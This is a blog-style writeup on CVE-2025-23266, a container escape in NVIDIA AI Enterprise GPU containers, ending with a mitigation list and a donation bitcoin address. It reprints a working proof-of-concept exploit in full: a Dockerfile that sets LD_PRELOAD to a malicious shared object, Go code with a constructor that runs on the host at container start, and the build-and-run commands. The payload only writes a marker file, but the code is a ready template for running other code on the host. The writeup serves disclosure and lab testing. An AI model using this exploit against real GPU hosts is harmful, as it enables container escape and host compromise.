NvidiaScape: CVE-2025-23266 – Easy Container Escape in NVIDIA AI Enterprise (with Go-based Exploit PoC)
Discovered by: Wiz Research
PoC Author: jpts
Published: July 2025
Severity: Critical (Container Escape → Host Compromise)
References:
🧠 Summary (for Everyone)
CVE-2025-23266, also called NvidiaScape, is a critical vulnerability in NVIDIA AI Enterprise containers that allows attackers to break out of a GPU container and run code on the host machine.
If you're using NVIDIA AI containers with GPU acceleration, and the environment is misconfigured (e.g., LD_PRELOAD not restricted), a malicious .so file can execute host-level code, letting an attacker escape the container sandbox.
🛠️ How the Exploit Works
The vulnerability comes down to this:
- Containers using NVIDIA runtime pass the GPU access and preload settings to user-space.
- No restriction is applied to
LD_PRELOAD, so an attacker can preload a malicious .so file.
- The preload file runs when the container starts — but on the host, not just inside the container.
The result? The container breaks free and touches the host filesystem.
🚀 Running the PoC (Go-Based Exploit)
Thanks to jpts, there's a working exploit using Go, compiled to a shared object. Here's a breakdown of the components.
🔧 Dockerfile
FROM golang:1.23 AS build
WORKDIR /build
COPY . .
RUN go build -buildmode=c-shared -o poc.so
FROM busybox:stable-glibc
ENV NVIDIA_VISIBLE_DEVICES=all
ENV LD_PRELOAD=/proc/self/cwd/poc.so
COPY --from=build /build/poc.so /poc.so
This creates a shared object (poc.so) that will be preloaded when the container runs.
💡 main.go – The Payload
package main
// extern void onload();
//
// __attribute__((constructor))
// __attribute__((weak))
// void load() {
// onload();
// }
import "C"
import (
"fmt"
"os"
"os/user"
)
//export onload
func onload() {
host, _ := os.Hostname()
user, _ := user.Current()
msg := []byte(fmt.Sprintf("host: %s\nuid: %s (%s)\n", host, user.Uid, user.Username))
_ = os.WriteFile("/hacked", msg, 0644)
}
func main() {}
This code runs on container start and writes host information to /hacked, proving host access.
🧾 go.mod
module github.com/jpts/cve-2025-23266-poc
go 1.23.9
▶️ Usage
To run the exploit in your test lab:
git clone https://github.com/jpts/cve-2025-23266-poc
cd cve-2025-23266-poc
docker build -t poc .
docker run --rm --runtime=nvidia poc
After running, check the host filesystem for /hacked. If the file appears, the exploit succeeded.
🔒 Mitigation
- Upgrade NVIDIA AI Enterprise to latest patched versions.
- Enforce container runtime flags that restrict
LD_PRELOAD.
- Ensure container isolation using runtime security tools (AppArmor, SELinux).
- Avoid passing arbitrary host access to GPU containers.
🧠 Final Thoughts
This exploit is incredibly simple yet powerful — no kernel exploit, no privilege escalation, just a shared library and a Dockerfile. It highlights why even small misconfigurations in AI/ML infrastructure can have massive consequences.
If you're running AI workloads in containers with GPU access — test this PoC in your lab, and patch immediately in production.
🔗 References
Support Crack-Vault and help us keep providing free tools. Every donation counts!
(BTC) Address: bc1qhhva8uplmkaa3kkwxnux9t3y6l6kmhnwqzktzn
